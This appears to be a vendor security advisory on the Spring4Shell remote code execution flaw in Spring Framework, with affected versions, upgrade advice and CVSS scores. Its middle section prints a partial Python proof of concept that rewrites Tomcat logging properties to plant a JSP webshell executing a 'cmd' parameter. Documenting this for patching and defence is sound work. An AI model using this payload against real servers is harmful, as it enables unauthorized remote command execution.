We found results for “


Date: April 1, 2022


A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.


The vulnerability in Spring Beans allows attackers under certain circumstances to achieve remote code execution (RCE). Current PoC related to the attack is done by creating a specially crafted request which manipulates ClassLoader to successfully achieve RCE.

PoC Details

The vulnerability is caused due to wrongly exposure of the class object getCachedIntrospectionResults method of Spring framework when binding its parameters.
The PoC code is sending POST request to the vulnerable application with specific headers and body that alters the Tomcat server’s logging properties via ClassLoader. The request leads to a creation of a jsp file, which in our case contains a malicious webshell code.Then the attacker execute the code by accessing the malicious jsp file in the following path - [server-ip]/[appname]/{filename}.jsp?cmd=[maliciouscommand].

PoC Code

post_headers = {"Content-Type": "application/x-www-form-urlencoded"}
get_headers = {"prefix": "<%", "suffix": "%>//", "c": "Runtime",}
# “"c": "Runtime" - This may seem strange, but this seems to be needed to bypass some check that looks for "Runtime" in the log_pattern
def run_exploit(url, directory, filename):
log_pattern =
"class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20" \
           f"java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter" \
           f"(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B" \
    log_file_suffix = "class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp"
    log_file_dir = f"class.module.classLoader.resources.context.parent.pipeline.first.directory={directory}"
    log_file_prefix = f"class.module.classLoader.resources.context.parent.pipeline.first.prefix={filename}"
    log_file_date_format = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="

    exp_data = "&".join([log_pattern, log_file_suffix, log_file_dir, log_file_prefix, log_file_date_format])

Affected Environments

Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions.


The preferred response is to update to Spring Framework 5.3.18 and 5.2.20 or greater. However, some may be in a position where upgrading is not possible to do quickly. For these cases, please visit WhiteSource Spring4Shell blog, which can be found in the Resources section in this page.

Language: Java

Good to know:


Code Injection


Upgrade Version

Upgrade to version org.springframework:spring-beans:5.2.20.RELEASE,5.3.18

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Low
Authentication (AU): None
Confidentiality (C): Partial
Integrity (I): Partial
Availability (A): Partial
Additional information: